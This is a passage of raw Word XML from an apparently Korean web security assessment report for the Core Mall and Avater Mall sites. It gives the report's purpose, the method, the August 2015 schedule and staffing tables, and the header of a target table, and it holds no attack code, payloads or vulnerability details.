        <w:t>Core Mall)</w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사이트</w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 아바타몰(Avater Mall) 사이트</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의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/>
        </w:rPr>
        <w:t>보안진단을</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>통해</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객사의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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개인정보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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유출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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>및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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보안</w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사고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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방지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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보안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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>강화에</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>그</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>목적</w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로</w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00C97C1E" w:rsidRDefault="001A1B46" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc408759295"/>
      <w:bookmarkStart w:id="58" w:name="_Toc408919441"/>
      <w:bookmarkStart w:id="59" w:name="_Toc48909005"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>진단 방법</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00A24C89" w:rsidRDefault="001A1B46" w:rsidP="00B004BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">고객과 협의 하에 </w:t>
      </w:r>
      <w:r w:rsidR="005E0662" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">운영 중인 사이트에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>최적화된</w:t>
      </w:r>
      <w:r w:rsidR="004F30EA" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E0662" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단항목을 이용하여</w:t>
      </w:r>
      <w:r w:rsidR="004F30EA" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 웹 페이지를 진단 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00A24C89" w:rsidRDefault="00281518" w:rsidP="00B004BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 항목을 기반으로 웹 페이지 진단 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00C97C1E" w:rsidRDefault="001A1B46" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc48909006"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">진단 </w:t>
      </w:r>
      <w:r w:rsidR="00281518" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>일정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00281518" w:rsidP="00B004BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1300"/>
          <w:tab w:val="num" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">취약성 진단 수행 세부 일정은 다음과 </w:t>
      </w:r>
      <w:r w:rsidR="009C4312" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>같음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C97C1E" w:rsidTr="00E30F75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0B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>일정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B43EF" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="394"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>대상선정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>대상 협의 / 환경 분석</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00B53510" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2015.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00957536" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B43EF" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="395"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>기술적</w:t>
            </w:r>
            <w:r w:rsidR="002843E1" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>취약점 점검 수행</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00957536" w:rsidP="006E25A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2015.08.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B43EF" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="395"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2180" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>결과분석 / 보고</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9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hint="eastAsia"/>
              </w:rPr>
              <w:t>취약점 결과보고서 및 보안대책 작성</w:t>
            </w:r>
            <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>, 보안진단결과보고서 제출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00957536" w:rsidP="006E25A9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/>
              </w:rPr>
              <w:t>2015.08.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B43EF" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="395"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2180" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9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3974" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="006E25A9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hint="eastAsia"/>
              </w:rPr>
              <w:t>보안진단결과보고서 제출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00B53510" w:rsidP="00957536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hint="eastAsia"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00957536" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>15.08.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="000B43EF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc48909106"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;표1- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>&gt; 진단일정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc48909007"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>진단 담당자</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">취약성 진단을 수행하는 인력은 다음과 </w:t>
      </w:r>
      <w:r w:rsidR="009C4312" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>같음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C97C1E" w:rsidTr="00E30F75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0B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>수행인원</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>수행업무</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00C97C1E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/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>연락처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B43EF" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="394"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00957536" w:rsidP="000B43EF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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3974" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00957536" w:rsidP="006E25A9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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>취약점 점검 및 진단 보고서 작성</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="00957536" w:rsidP="006E25A9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/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000B43EF" w:rsidRPr="00A24C89" w:rsidRDefault="000B43EF" w:rsidP="000B43EF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc48909107"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;표1- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>&gt; 수행인원</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="000B43EF" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc48909008"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>진단대상</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="142" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="10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60"/>
        <w:gridCol w:w="2577"/>
        <w:gridCol w:w="2759"/>
      </w:tblGrid>
      <w:tr w:rsidR="00490D58" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="363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490D58" w:rsidRPr="00C97C1E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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00C97C1E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IP</w:t>
            </w:r>
            <w:r w:rsidR="00E30F75" w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="맑은 고딕" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00E30F75" w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="맑은 고딕" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2577" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00C97C1E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WEB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2759" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00C97C1E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비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
